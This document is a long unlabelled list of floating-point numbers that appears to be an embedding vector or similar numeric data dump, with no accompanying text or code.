0.02188972942531109, -0.010104595683515072, 0.019069842994213104, 0.0005972677608951926, -0.006675868760794401, 0.015409685671329498, 0.013999742455780506, -0.0041265771724283695, -0.01733233593404293, -0.045203644782304764, -0.004596558399498463, -0.002761139301583171, -0.04882107675075531, -0.015893908217549324, 0.008253154344856739, 0.01972496695816517, 0.025920173153281212, -0.039734773337841034, 0.047339923679828644, 0.03022121451795101, 0.013529760763049126, -0.01419912837445736, -0.05802131071686745, 0.03560463339090347, 0.00709244329482317, -0.007875745184719563, -0.02082158997654915, -0.06950024515390396, -0.0007103124517016113, -0.012048608623445034, -0.02485203556716442, -0.009349777363240719, 0.0016787585336714983, 0.01723264344036579, 0.029964860528707504, 0.029537605121731758, -0.019084084779024124, -0.017047498375177383, -0.022473644465208054, 0.03987719118595123, 0.03056301921606064, 0.017902011051774025, 0.0076621174812316895, -0.008246033452451229, -0.02398328110575676, -0.042811013758182526, -0.037484560161828995, 0.022359710186719894, -0.016990531235933304, 0.05409055948257446, -0.007476973347365856, 0.018101396039128304, -0.011058799922466278, 0.030107278376817703, -0.013786114752292633, -0.012262236326932907, 0.030192730948328972, 0.04318130016326904, -0.019981320947408676, 0.011571506038308144, 0.010937743820250034, 0.023029077798128128, -0.03774091228842735, 0.007840140722692013, 0.020907040685415268, 0.0348355732858181, -0.011699683032929897, -0.0032364611979573965, -0.009093423373997211, 0.006675868760794401, 0.013408705592155457, -0.010702753439545631, -0.03463618829846382, 0.030676953494548798, 0.0005776851903647184, -0.00023966369917616248, -0.013244924135506153, 0.0023249825462698936, 0.005326453130692244, -0.002374829025939107, -0.022032147273421288, -0.005458190571516752, -0.010510488413274288, 0.03238597512245178, -0.0604993961751461, 0.00875161960721016, 0.029053382575511932, 0.0025777756236493587, 0.005472432356327772, -0.020422818139195442, -0.013793235644698143, -0.0007841920596547425, -0.010432157665491104, 0.009235842153429985, -0.01626419648528099, -0.018186846747994423, 0.021476715803146362, -0.03395257890224457, -0.01639237441122532, 0.02825583890080452, -0.005443948786705732, -0.026959829032421112, 0.012084213085472584, 0.0014135040109977126, -0.005354937165975571, -0.028797028586268425, -0.017887769266963005, 0.0048849559389054775, 0.002218168694525957, 0.004076730459928513, 0.003617430804297328, -0.017617173492908478, -0.00737015949562192, 0.022103358060121536, 0.03287019953131676, -0.007598028983920813, 0.008246033452451229, 0.008915400132536888, 0.019012873992323875, -0.0015968678053468466, -0.023570267483592033, 0.03620279207825661, -0.011030315421521664, 0.004735416267067194, -0.004778142087161541, 0.018742280080914497, -0.009015093557536602, 0.018941665068268776, 0.01828654110431671, -0.022516371682286263, -0.008303000591695309, 0.007697721943259239, -0.014505327679216862, 0.022530613467097282, 0.014548053964972496, 0.025179598480463028, 0.023228462785482407, -0.04597270488739014, -0.005942413583397865, -0.01640661619603634, 0.013387342914938927, 0.03711427003145218, -0.008951005525887012, -0.007263345643877983, -0.004916999954730272, -0.025578370317816734, 0.009969297796487808, -0.008943884633481503, -0.005554323084652424, 0.015395443886518478, 0.004297479521483183, 0.0437224917113781, 0.008011043071746826, 0.018201088532805443, -0.010012023150920868, -0.035433731973171234, -0.0017802317161113024, 0.01978193409740925, -0.01744627021253109, -0.015139090828597546, -0.009983539581298828, 0.008958126418292522, 0.0012577336747199297, 0.014996672049164772, -0.008324363268911839, 0.025920173153281212, -0.002143399091437459, -0.009385381825268269, 0.028754303231835365, 0.0124188968911767, 0.005461751017719507, 0.01418488658964634, 0.04696963354945183, 0.05007435753941536, -0.007266906090080738, 0.008082251995801926, -0.035205863416194916, 0.002860832493752241, -0.014612141996622086, 0.0031349880155175924, 0.03181630000472069, -0.03164539858698845, -0.02278696559369564, 0.027914034202694893, -0.009435228072106838, 0.008594959042966366, -0.016776904463768005, 0.0016609561862424016, 0.011834980919957161, -0.01135787833482027, -0.0003204417007509619, -0.007266906090080738, -0.02191821299493313, -0.011763771064579487, -0.0163781326264143, 0.022373951971530914, -0.01142196636646986, 0.015893908217549324, 0.016762662678956985, 0.013778993859887123, 0.0036708377301692963, -0.014840011484920979, -0.019240744411945343, 0.03435135260224342, -0.0003400242712814361, -0.03155994787812233, -0.0014491085894405842, 0.01976769231259823, 0.035148896276950836, 0.00010247458703815937, 0.013202198781073093, 0.00679336441680789, 0.017161434516310692, 0.004685570020228624, -0.028626125305891037, -0.044092778116464615, -0.03241445869207382, 0.0033860006369650364, -0.02717345766723156, -0.025478675961494446, -0.0004855582083109766, 0.023442091420292854, 0.013957017101347446, -0.013365980237722397, 0.006248613353818655, 0.017104465514421463, -0.01140772458165884, 0.009250083938241005, -0.02617652714252472, 0.016990531235933304, -0.0029854485765099525, -0.02382662147283554, 0.012903119437396526, 0.0048422301188111305, -0.008566475473344326, 0.002228850033134222, -0.012055729515850544, -0.012596920132637024, -0.04170014709234238, -0.031047241762280464, 0.022260017693042755, -0.024481747299432755, 0.009755670092999935, 0.04751082509756088, 0.0034518693573772907, 0.003731365781277418, -0.033098068088293076, -0.020380092784762383, 0.012098454870283604, 0.004689130466431379, -0.040845636278390884, -0.004546711686998606, -0.01858561858534813, -0.005130627658218145, -0.0007356807473115623, -0.0034091437701135874, 0.01731809414923191, 0.023242704570293427, -0.008310121484100819, -0.026731960475444794, 0.007548182737082243, -0.03494950756430626, -0.005002451129257679, 0.006081271450966597, -0.01314523071050644, -0.00045329148997552693, -0.0001670079946052283, 0.022559097036719322, 0.027899792417883873, -0.018728038296103477, -0.011272427625954151, 0.027999484911561012, 0.040959570556879044, -0.009307051077485085, -0.010204288177192211, 0.008473902940750122, -0.0014037126675248146, 0.023014836013317108, 0.0002688149979803711, 0.012675249949097633, 0.015466652810573578, 0.01024701353162527, 0.026632266119122505, -0.01751748099923134, -0.014968188479542732, 0.01728961057960987, 0.009997781366109848, -0.0033753192983567715, -0.024510230869054794, 0.0060990736819803715, 0.00012728656292892992, -0.025421708822250366, 0.008473902940750122, 0.020964009687304497, -0.004197786562144756, 0.014370030723512173, 0.0022092675790190697, 0.001754418364726007, -0.00684321066364646, 0.022331226617097855, 0.013166594319045544, 0.009620372205972672, 0.022487888112664223, -0.011507418006658554, 0.0119346734136343, 0.0064088343642652035, -0.03158843144774437, -0.03463618829846382, 0.024738099426031113, 0.008737376891076565, -0.0048885163851082325, -0.03813968598842621, -0.01741778664290905, 0.026561057195067406, -0.006910859607160091, -0.01847168430685997, 0.03503496199846268, 0.006458680611103773, 0.010040506720542908, 0.0025564127136021852, 0.010702753439545631, 0.0005389651632867754, -0.017574448138475418, -0.007277587428689003, -0.01251858938485384, 0.03227204084396362, 0.012247994542121887, 0.0037740913685411215, 0.011144250631332397, -0.018955906853079796, -0.02500869520008564, 0.021946696564555168, 0.029850926250219345, -0.00682896887883544, -0.00025479565374553204, 0.040703218430280685, -0.009456590749323368, -0.002342785010114312, 0.004037565551698208, -0.006554813124239445, -0.007202817592769861, 0.01251858938485384, 0.03036363236606121, 0.000248119788011536, 0.021490957587957382, 0.0011322273639962077, -0.019326195120811462, -0.01850016787648201, -0.008367089554667473, 0.0018033747328445315, -0.047197502106428146, 0.02724466659128666, -0.011058799922466278, 0.015153332613408566, -0.008103614673018456, 0.030876338481903076, -0.002232410479336977, 0.006451559718698263, -0.008267396129667759, -0.007740447763353586, -0.004692690912634134, -0.03685791790485382, 0.0006333174533210695, 0.012013004161417484, -0.019198019057512283, -0.029822442680597305, 0.012661008164286613, 0.03343987092375755, 0.02495172806084156, 0.03153146430850029, 0.004831548780202866, -0.004058928228914738, 0.009819758124649525, -0.009470832534134388, 0.004931241739541292, -0.03272778168320656, 0.0035622436553239822, 0.019853144884109497, -0.0028768545016646385, -0.023043319582939148, 0.025692304596304893, -0.02948063798248768, -0.026902861893177032, -0.06112603843212128, 0.007954075001180172, -0.022316984832286835, -0.020194949582219124, -0.01955406554043293, 0.040560800582170486, -0.0016787585336714983, -0.010211409069597721, 0.025763513520359993, -0.020152222365140915, -0.01139348279684782, -0.01079532504081726, 0.00031398836290463805, -0.0041265771724283695, -0.004806625656783581, -0.019881628453731537, -0.013358859345316887, 0.009250083938241005, -0.0216476172208786, 0.02077886462211609, -0.024225393310189247, 0.015737248584628105, -0.007266906090080738, 0.00568249961361289, 0.007206378038972616, -0.013280528597533703, -0.02376965433359146, -0.01362233329564333, 0.005034495145082474, -0.013850202783942223, -0.007298950105905533, -0.014298820868134499, -0.0018923863535746932, -0.005999380722641945, -0.02486627735197544, 0.01720415987074375, -0.02950912155210972, 0.01634964905679226, -0.016506308689713478, 0.0059174904599785805, 0.010987590067088604, -0.004536030348390341, 0.01831502467393875, 0.012632524594664574, 0.00877298228442669, -0.02821311168372631, -0.04261162504553795, -0.0023178616538643837, -0.00623081112280488, -0.030648469924926758, 0.010446399450302124, 0.004258314147591591, 0.04867865517735481, -0.006882376037538052, -0.003193735610693693, -0.015509379096329212, -0.02479506842792034, -0.019981320947408676, -0.009577646851539612, -0.025678062811493874, -0.02599138393998146, -0.007010552566498518, 0.024567198008298874, -0.009449469856917858, -0.011564385145902634, -0.015067880973219872, -0.015922391787171364, 0.010503367520868778, 0.0073559177108109, 0.0007565984851680696, 0.013971258886158466, -0.03144601359963417, -0.027401326224207878, 0.016549034044146538, 0.00817482452839613, 0.012717975303530693, -0.03477860614657402, 0.01647782512009144, 0.0163781326264143, 0.024567198008298874, -0.03990567475557327, 0.01744627021253109, 0.015908150002360344, -0.03688640147447586, 0.011087283492088318, -0.016022086143493652, -0.03361077606678009, 0.00019782825256697834, 0.022388193756341934, -0.014063830487430096, -0.003681519301608205, -0.035234346985816956, 0.017930494621396065, -0.01738930307328701, 0.013494156301021576, -0.009769911877810955, -0.009762790985405445, 0.0027112928219139576, 0.004760339856147766, -0.04973255470395088, 0.0035586832091212273, 0.0027112928219139576, -0.02402600832283497, -0.015438169240951538, 0.026703475043177605, 0.013743389397859573, 0.02496596984565258, -0.027814339846372604, 0.00029529593302868307, 0.0036352332681417465, -0.017973219975829124, -0.007142289541661739, 0.018015945330262184, -0.014669109135866165, -0.024282360449433327, 0.010674269869923592, -0.010332465171813965, 0.007145849987864494, -0.014939704909920692, 0.033069584518671036, 0.007138729095458984, -0.013195077888667583, 0.02075038105249405, 0.025763513520359993, 0.009570525959134102, -0.0023445652332156897, -0.016620242968201637, 0.0034483089111745358, 0.031930238008499146, -0.003937872592359781, 0.009613251313567162, -0.006650945637375116, -0.02186124585568905, -0.02610531821846962, 0.0013939214404672384, 0.03241445869207382, 0.015409685671329498, -0.010773962363600731, -0.0018282979726791382, -0.004742537159472704, 0.014911221340298653, 0.000378521770471707, 0.018058670684695244, -0.037541527301073074, -0.017702624201774597, 0.0326138436794281, -0.010474883951246738, 0.022174566984176636, -0.004746097605675459, -0.03170236572623253, 0.015537862665951252, 0.039734773337841034, 0.030904822051525116, -0.03571856766939163, -0.018144121393561363, 0.012290719896554947, -0.021049460396170616, -0.006423076149076223, 0.006978508550673723, -0.015993602573871613, -0.002675688359886408, 0.020081013441085815, 0.010531851090490818, 0.007897107861936092, 0.007505456916987896, -0.01253283116966486, 0.0071209268644452095, 0.02080734819173813, -0.03269929811358452, 0.007017673458904028, -0.005315771792083979, -0.01194891519844532, 0.015409685671329498, 0.06289202719926834, -0.010595939122140408, 0.002259114058688283, -0.0018024846212938428, -0.005928171798586845, 0.01308826357126236, 0.0018674631137400866, 0.012205269187688828, 0.028982171788811684, -0.01720415987074375, 0.006123997271060944, -0.01721840165555477, 0.016862355172634125, 0.0017588689224794507, 0.024282360449433327, -0.01247586403042078, -0.0035978483501821756, -0.03241445869207382, 0.0026845894753932953, 0.01828654110431671, 0.005287288222461939, -0.0024300164077430964, -0.0019760571885854006, -0.011671199463307858, -0.012233752757310867, -0.012126938439905643, 0.0064123948104679585, 0.004767460748553276, 0.008865553885698318, 0.0064088343642652035, 0.023171495646238327, 0.011578626930713654, 0.004155060742050409, -0.01474031899124384, 0.023470574989914894, -0.03352532535791397, -0.0015772853512316942, -0.0006039435975253582, 0.025378983467817307, -0.016492066904902458, -0.013465672731399536, 0.0001969381410162896, -0.02291514351963997, 0.027614954859018326, -0.016748420894145966, -0.02085007354617119, -0.015452411025762558, -0.03130359575152397, 0.01141484547406435, -0.00029529593302868307, -0.020992493256926537, -0.018927423283457756, -0.036487627774477005, 0.014797286130487919, -0.0068503315560519695, 0.008979489095509052, 0.004005521535873413, 0.08795768767595291, -0.012312082573771477, -0.0028056451119482517, -0.020152222365140915, -0.032129622995853424, 0.008445419371128082, 0.014006863348186016, 0.005340695381164551, 0.008929641917347908, -0.016064811497926712, -0.001872803783044219, 0.01841471716761589, -0.0032400216441601515, 0.02056523784995079, 0.019383162260055542, 0.029537605121731758, -0.020422818139195442, -0.009299930185079575, 0.02075038105249405, 0.007747568655759096, 0.007498336024582386, 0.02277272380888462, -0.0014295261353254318, -0.009178875014185905, 0.011172734200954437, -0.003526638960465789, -0.016848113387823105, -0.016591759398579597, -0.0259486585855484, 0.004756779409945011, 0.019254986196756363, -0.010161562822759151, -0.016848113387823105, -0.009143270552158356, -0.0005358497728593647, -0.000998710049316287, 0.010417915880680084, 0.02614804357290268, -0.014498206786811352, -0.019283469766378403, -0.030648469924926758, -0.024766582995653152, -0.012867514975368977, 0.026874378323554993, 0.002004540991038084, 0.00011415735934861004, 0.02507990412414074, -0.0163781326264143, -0.008409814909100533, 0.009292809292674065, -0.015338476747274399, -0.01306690089404583, -0.0010788204381242394, 0.0015666038962081075, 0.027928275987505913, -0.010951985605061054, -0.023313915356993675, -0.008345725946128368, -0.011799375526607037, -0.004151500295847654, 0.007298950105905533, 0.001876364229246974, -0.0226872731000185, 0.010318223387002945, 0.012041487731039524, -0.00680760620161891, -0.017090223729610443, -0.00021941355953458697, -0.014241853728890419, 0.014569416642189026, 0.02718769945204258, -0.0019992003217339516, 0.009385381825268269, 0.0038239378482103348, -0.00029930146411061287, -0.011607110500335693, 0.007420005742460489, 0.03022121451795101, -0.026874378323554993, -0.024396294727921486, -0.002807425335049629, 0.009178875014185905, 0.018970148637890816, 0.026546815410256386, 0.0022466524969786406, 0.023527542129158974, -0.017033256590366364, -0.01959679089486599, -0.011842101812362671, 0.0007646095473319292, -0.005337134934961796, -0.00042881330591626465, 0.008708893321454525, -0.009292809292674065, 0.009164633229374886, 0.044178228825330734, -0.002867953386157751, -0.0066224620677530766, -0.018201088532805443, -0.008011043071746826, 0.011628474108874798, -0.005782192572951317, 0.004952604882419109, -0.014654867351055145, -0.01627843827009201, 0.014626383781433105, 0.0002972987131215632, -0.017987461760640144, 0.00019304387387819588, -0.00149717484600842, -0.011478934437036514, -0.008295879699289799, 0.009442348964512348, -0.0066295829601585865, -0.010503367520868778, 0.023456333205103874, -0.0019333316013216972, 0.010353827849030495, -0.009392502717673779, -0.023641478270292282, -0.029138833284378052, 0.010517609305679798, 0.009869604371488094, -0.033240485936403275, 0.010553213767707348, 0.0021523002069443464, 0.006864573340862989, -0.023057561367750168, 0.013223561458289623, -0.012383291497826576, 0.028868237510323524, 0.007697721943259239, 0.02925276756286621, 0.006939343176782131, 0.004916999954730272, -0.005518718156963587, 0.018001703545451164, -0.013914290815591812, 0.0007668348262086511, 0.015509379096329212, -0.009000851772725582, 0.001442877808585763, -0.0009711164166219532, 0.02159065008163452, 0.007281147874891758, 0.0004806625656783581, -0.00314388913102448, 0.0012853273656219244, 0.011201217770576477, 0.008409814909100533, 0.01357960794121027, -0.038509972393512726, 0.015381202101707458, 0.0013057999312877655, 0.005166232585906982, -0.015495137311518192, 0.025393225252628326, -0.02933821827173233, -0.021946696564555168, 0.027686163783073425, 0.0009185995440930128, 0.01197027787566185, 0.0036708377301692963, -0.02180427871644497, -0.006433757487684488, 0.025806238874793053, -0.004240511916577816, -0.00005510373375727795, -0.026945587247610092, 0.015737248584628105, 0.0271307323127985, -0.0037028819788247347, -0.015594829805195332, 0.005098583642393351, 0.0023285429924726486, 0.03412348031997681, 0.023684203624725342, -0.0005799104692414403, 0.017574448138475418, -0.010724116116762161, 0.004308160860091448, -0.0025546324905008078, 0.02718769945204258, 0.0016689671901986003, -0.020964009687304497, -0.019867386668920517, 0.005490234587341547, 0.011108646169304848, -0.03269929811358452, 0.004860032815486193, 0.01247586403042078, 0.030961791053414345, -0.019027117639780045, -0.01850016787648201, 0.012938723899424076, -0.030078794807195663, 0.003923630807548761, -0.017973219975829124, -0.002130937296897173, -0.022060630843043327, -0.01299569196999073, -0.017873527482151985, 0.0036085296887904406, 0.009371140040457249, -0.010432157665491104, -0.024154184386134148, -0.003884465666487813, 0.005461751017719507, -0.009413865394890308, 0.008495265617966652, -0.0004430551780387759, -0.017716865986585617, -0.003031734609976411, -0.015509379096329212, 0.03153146430850029, 0.003348615951836109, 0.006643824744969606, -0.026988312602043152, -0.0013832401018589735, -0.012262236326932907, 0.013928532600402832, -0.0035515623167157173, -0.014854253269731998, -0.00310828466899693, -0.03361077606678009, -0.015609071590006351, 0.011763771064579487, -0.014483965002000332, -0.014013984240591526, -0.005889006424695253, -0.014099434949457645, -0.027614954859018326, 0.005226760171353817, 0.007833019830286503, -0.015139090828597546, -0.0021736628841608763, -0.0003286752908024937, -0.019895870238542557, -0.004600118845701218, 0.01976769231259823, 0.005461751017719507, 0.0046713282354176044, -0.023684203624725342, 0.0002872848999686539, 0.0024335768539458513, -0.00030664491350762546, 0.006907299160957336, 0.010047627612948418, -0.0018443200970068574, -0.00018124983762390912, -0.0037206842098385096, 0.0013262726133689284, 0.013252045027911663, -0.002255553612485528, -0.012810547836124897, 0.01620722934603691, 0.009769911877810955, -0.025208082050085068, -0.0228296909481287, -0.0048457905650138855, 0.03996264189481735, -0.01254707295447588, -0.016791146248579025, 0.01945437304675579, -0.025735029950737953, 0.009819758124649525, -0.027743130922317505, -0.011293790303170681, -0.006839650217443705, -0.003092262428253889, 0.014070951379835606, 0.00542614609003067, -0.008915400132536888, -0.01832926645874977, -0.016549034044146538, 0.010930622927844524, 0.018001703545451164, 0.0033788797445595264, 0.00005730120756197721, 0.009485074318945408, 0.00568249961361289, 0.05736618861556053, 0.006718594580888748, -0.033325936645269394, -0.007298950105905533, -0.002656105672940612, -0.03355380892753601, 0.010588818229734898, -0.0228296909481287, -0.008559354580938816, -0.011564385145902634, -0.009627493098378181, -0.0030050312634557486, -0.015139090828597546, 0.021120669320225716, -0.005333574488759041, -0.01831502467393875, 0.0262334942817688, 0.026603782549500465, -0.001328052836470306, 0.010218529962003231, 0.021419748663902283, 0.010446399450302124, -0.0058640833012759686, 0.011037436313927174, -0.004899197723716497, -0.03907964751124382, -0.0016930003184825182, 0.005230320617556572, -0.0006635813624598086, -0.02050826884806156, 0.013323253951966763, -0.036345209926366806, 0.008915400132536888, 0.0009292809409089386, 0.004970407113432884, -0.03278474882245064, 0.019895870238542557, -0.026860136538743973, 0.022103358060121536, 0.00877298228442669, -0.01366505865007639, -0.016876596957445145, 0.002892876509577036, -0.015552104450762272, -0.00438293069601059, -0.01416352391242981, -0.01746051199734211, -0.012304961681365967, -0.01969648338854313, 0.017973219975829124, -0.0013164813863113523, 0.016890838742256165, -0.002139838645234704, -0.010410794988274574, -0.006643824744969606, 0.016876596957445145, -0.020223433151841164, -0.008338605053722858, -0.007669238373637199, -0.03500647842884064, 0.025250807404518127, 0.0015692742308601737, -0.0048813954927027225, 0.02515111304819584, 0.004973967559635639, -0.0043936120346188545, 0.003186614718288183, -0.010702753439545631, -0.009029335342347622, -0.018713796511292458, -0.00707108061760664, -0.0004132362955715507, -0.0018567816587164998, 0.01620722934603691, 0.010311102494597435, 0.0006622461951337755, -0.0004784372868016362, 0.025293532758951187, -0.024367811158299446, -0.018030187115073204, -0.01643509976565838, -0.0006373229552991688, 0.00597445759922266, 0.013323253951966763, -0.026646507903933525, -0.010553213767707348, -0.005226760171353817, 0.0005429706652648747, 0.020266158506274223, -0.005565004423260689, -0.009841120801866055, 0.0063589876517653465, -0.024766582995653152, -0.0038025749381631613, 0.0016947806579992175, 0.024225393310189247, -0.042896464467048645, -0.001503405743278563, 0.03888026252388954, -0.021006735041737556, 0.024624165147542953, -0.025507159531116486, 0.0030335148330777884, 0.0005158221465535462, 0.01620722934603691, -0.014377151615917683, -0.04124440997838974, -0.0053798602893948555, -0.021163394674658775, 0.0013574267504736781, -0.006269976031035185, 0.01737506128847599, 0.05081493407487869, -0.010147321037948132, -0.00709956418722868, -0.02389783039689064, 0.015737248584628105, 0.0037776518147438765, -0.01142196636646986, 0.009869604371488094, -0.025763513520359993, -0.008851312100887299, 0.017873527482151985, 0.013850202783942223, 0.0026187209878116846, -0.02285817451775074, -0.026689233258366585, 0.02507990412414074, -0.0064088343642652035, -0.006426636595278978, -0.00014264107448980212, -0.02506566233932972, -0.0323290079832077, -0.019967079162597656, -0.013900049030780792, 0.010339586064219475, 0.029993344098329544, 0.020223433151841164, -0.017773833125829697, 0.02050826884806156, -0.021547924727201462, -0.007042596582323313, -0.01199164055287838, -0.017788074910640717, -0.003870223881676793, -0.01834350824356079, 0.002634742995724082, -0.003508836729452014, 0.015779973939061165, 0.020437059924006462, 0.002143399091437459, 0.015039397403597832, -0.0019724967423826456, 0.006971387658268213, -0.01132939476519823, 0.0036014087963849306, 0.007291829213500023, -0.027985243126749992, -0.004201347008347511, 0.011664078570902348, -0.009214479476213455, 0.0073487963527441025, -0.00650852732360363, -0.0027041719295084476, 0.004731855820864439, -0.037399109452962875, 0.007056838367134333, -0.023399366065859795, -0.005262365099042654, 0.025378983467817307, -0.011699683032929897, 0.016776904463768005, 0.009534921497106552, -0.005906808655709028, -0.004037565551698208, -0.009520679712295532, -0.0008037746301852167, 0.00599582027643919, -0.0006297569489106536, 0.027657680213451385, -0.01194179430603981, 0.0033646379597485065, -0.01314523071050644, 0.021248845383524895, -0.0069001782685518265, 0.012126938439905643, -0.013444310054183006, -0.021149152889847755, -0.020351609215140343, 0.012297840788960457, -0.004507546778768301, 0.013387342914938927, 0.0008594068931415677, 0.007181454915553331, 0.004058928228914738, -0.011001831851899624, -0.013957017101347446, 0.015096365474164486, 0.0008598519489169121, 0.014896979555487633, 0.030676953494548798, 0.002091772388666868, 0.0016235713846981525, -0.0016876596491783857, -0.007776052225381136, 0.004635723307728767, -0.015609071590006351, 0.010133079253137112, -0.024068733677268028, -0.0025742151774466038, -0.017902011051774025, -0.01246874313801527, -0.004877835046499968, 0.016022086143493652, 0.0019048479152843356, 0.010118837468326092, 0.022530613467097282, 0.0037171237636357546, -0.0046179210767149925, -0.004503986332565546, -0.0004944593529216945, -0.015352718532085419, -0.0164493415504694, -0.010980469174683094, -0.0164493415504694, 0.0008144560270011425, 0.0040838513523340225, 0.008993730880320072, -0.010004902258515358, 0.006433757487684488, -0.0017989241750910878, -0.004774581640958786, -0.01239753421396017, -0.016079053282737732, 0.007911349646747112, 0.012141180224716663, 0.005191155709326267, 0.003546221647411585, -0.005824918393045664, -0.008075131103396416, -0.0021825639996677637, 0.020251916721463203, -0.02928125113248825, -0.021448232233524323, 0.0030406357254832983, 0.01952558197081089, -0.0010761501034721732, -0.00010319780994905159, -0.005536520853638649, 0.0013405145145952702, 0.011179855093359947, -0.002848370699211955, -0.01726112700998783, 0.01727536879479885, 0.0014161743456497788, 0.026717718690633774, -0.009812637232244015, 0.007213498931378126, -0.012041487731039524, -0.002590237185359001, -0.002282257191836834, 0.0002892876509577036, 0.0023071803152561188, -0.007412884850054979, -0.005322892684489489, 0.000575904967263341, -0.02272999845445156, -0.014825769700109959, 0.0015674940077587962, 0.01831502467393875, 0.013985500670969486, -0.008310121484100819, -0.0019582549575716257, -0.004062488675117493, 0.004973967559635639, -0.0034465286880731583, 0.0003667277342174202, -0.007021233905106783, 0.0008117856923490763, -0.009093423373997211, 0.02083583176136017, 0.013387342914938927, 0.014512449502944946, 0.0003651700390037149, 0.010987590067088604, 0.00625929469242692, -0.014377151615917683, -0.004603679291903973, -0.026788927614688873, 0.0033379343803972006, -0.008965247310698032, -0.015082122758030891, 0.006768440827727318, 0.008851312100887299, 0.008295879699289799, 0.017161434516310692, -0.01972496695816517, -0.00382037740200758, -0.004774581640958786, 0.0058783250860869884, 0.011827860027551651, -0.014256095513701439, -0.016520550474524498, -0.006316262297332287, 0.00037006568163633347, 0.00007298950367840007, -0.0015399004332721233, -0.014434118755161762, 0.003994840197265148, 0.023143012076616287, -0.0021950257942080498, -0.028597641736268997, 0.02611956000328064, -0.006298460066318512, -0.009050698019564152, -0.023442091420292854, 0.004632162861526012, -0.002218168694525957, 0.026589540764689445, 0.0006462241290137172, 0.0017401764634996653, 0.007334554567933083, 0.001872803783044219, -0.00596021581441164, -0.00006108420348027721, 0.005233881063759327, -0.010133079253137112, 0.014868495054543018, -0.009057818911969662, 0.004254753701388836, -0.003920070361346006, -0.002323202323168516, -0.0020205629989504814, -0.0032631647773087025, -0.013394463807344437, -0.024211151525378227, -0.012062850408256054, -0.0043473257683217525, -0.007505456916987896, -0.0016565056284889579, -0.005358497612178326, 0.010154441930353642, 0.0051484303548932076, 0.010289739817380905, 0.0059139300137758255, 0.007840140722692013, -0.013900049030780792, -0.016719935461878777, 0.02624773606657982, -0.0022128280252218246, -0.010026264935731888, -0.0016173404874280095, -0.0029925694689154625, -0.002086431486532092, 0.017759591341018677, -0.0013663278659805655, 0.016705693677067757, -0.02190397121012211, 0.003238241421058774, -0.002138058189302683, -0.010980469174683094, -0.024339327588677406, -0.02829856425523758, -0.009898088872432709, 0.00009412975487066433, 0.004276116378605366, -0.010617301799356937, -0.00819618720561266, 0.03230052441358566, -0.0007948734564706683, 0.0005358497728593647, -0.019981320947408676, 0.0013084702659398317, -0.010610180906951427, -0.00313676823861897, -0.012604041025042534, 0.0033610775135457516, 0.009093423373997211, 0.005547202192246914, -0.00010642447887221351, 0.015566346235573292, -0.012069971300661564, 0.0065583735704422, 0.014555174857378006, -0.0120058823376894, -0.016990531235933304, 0.014334426261484623, -0.009242963045835495, 0.014035346917808056, 0.02728739194571972, 0.002408653497695923, -0.009691581130027771, -0.011030315421521664, -0.01723264344036579, -0.01258267741650343, 0.014248974621295929, 0.010859414003789425, -0.010346706956624985, 0.017973219975829124, -0.013544002547860146, 0.01185634359717369, -0.003916509915143251, 0.012361928820610046, 0.0011776232859119773, -0.007234861608594656, 0.004194226115942001, -0.008324363268911839, -0.014783044345676899, -0.015751490369439125, 0.01736081950366497, 0.006925101391971111, 0.017061740159988403, -0.005547202192246914, 0.008872674778103828, -0.04545999690890312, -0.020422818139195442, 0.017004773020744324, -0.026418639346957207, 0.02183276228606701, 0.004411414265632629, 0.00512706721201539, 0.0011527000460773706, 0.004187105223536491, -0.00568249961361289, 0.0035569029860198498, -0.005792873911559582, -0.00823179166764021, 0.010859414003789425, 0.0007988790166564286, -0.0015025156317278743, -0.009200237691402435, 0.018072912469506264, 0.01305978000164032, -0.01966799981892109, 0.009335535578429699, -0.0024834233336150646, 0.008915400132536888, 0.016662968322634697, -0.0005763500230386853, -0.025193840265274048, 0.0031385484617203474, 0.014968188479542732, -0.02502293698489666, -0.005853401962667704, -0.00007565984560642391, 0.030819371342658997, 0.008246033452451229, -0.0240117646753788, -0.0010102814994752407, 0.01630692183971405, 0.0036316728219389915, 0.02076462283730507, -0.012312082573771477, -0.000021126343199284747, -0.005785753019154072, -0.004817306995391846, -0.04019051045179367, 0.0011678320588544011, -0.02728739194571972, 0.016677210107445717, 0.014056709595024586, -0.0017695503775030375, -0.01254707295447588, 0.009278567507863045, -0.007135168649256229, -0.006419515702873468, 0.006672308314591646, 0.0017526381416246295, -0.000702746503520757, -0.015395443886518478, 0.0018265177495777607, -0.011051679030060768, -0.01639237441122532, 0.020038288086652756, -0.011201217770576477, 0.00006531224789796397, -0.0019582549575716257, 0.006939343176782131, 0.013365980237722397, 0.01633540540933609, 0.03509192913770676, 0.004026884213089943, 0.023256948217749596, 0.019326195120811462, 0.016022086143493652, 0.005059418734163046, 0.0018567816587164998, -0.004831548780202866, -0.015295751392841339, -0.005265925545245409, 0.02072189748287201, 0.014854253269731998, -0.006725715473294258, 0.030733920633792877, 0.0016938905464485288, -0.0068610128946602345, -0.01246162224560976, 0.005233881063759327, -0.02297211065888405, 0.005493795033544302, -0.011087283492088318, -0.01857137680053711, 0.00596021581441164, 0.02156216651201248, -0.014078072272241116, -0.0037918935995548964, -0.0009453030652366579, -0.002682809252291918, 0.0010147320572286844, 0.006985629443079233, -0.024310844019055367, 0.010282618924975395, 0.004710493143647909, -0.0237269289791584, -0.029081866145133972, 0.009969297796487808, 0.0007454720325767994, 0.0051591116935014725, 0.0008794344612397254, -0.006928661838173866, -0.026845894753932953, -0.014362909831106663, -0.004568074829876423, 0.019240744411945343, 0.01617874577641487, 0.011621352285146713, 0.0015870765782892704, 0.0029391625430434942, 0.007298950105905533, -0.01364369597285986, 0.005041616037487984, -0.005475992802530527, 0.005340695381164551, 0.003766970243304968, 0.003051317296922207, -0.00270951259881258, 0.006711473688483238, 0.013401584699749947, -0.009271446615457535, 0.0009622152429074049, -0.023271190002560616, 0.02832704782485962, 0.0035871670115739107, 0.005038055591285229, -0.021049460396170616, -0.013280528597533703, -0.03617430850863457, 0.00313676823861897, -0.017702624201774597, -0.008295879699289799, -0.007014113012701273, 0.0016440439503639936, -0.005714543629437685, -0.02179003693163395, -0.023157253861427307, -0.014683350920677185, -0.002120255958288908, -0.012596920132637024, -0.009257204830646515, -0.02264454774558544, 0.009705823846161366, 0.001747297472320497, 0.00003304555139038712, -0.026703475043177605, -0.017702624201774597, -0.010496246628463268, -0.00010330907389288768, -0.002360587241128087, -0.01647782512009144, 0.0064088343642652035, 0.011770891956984997, -0.009079181589186192, 0.001225689542479813, 0.023157253861427307, -0.005087902303785086, -0.0013164813863113523, -0.02822735346853733, -0.022573338821530342, -0.004717614036053419, 0.01085229218006134, 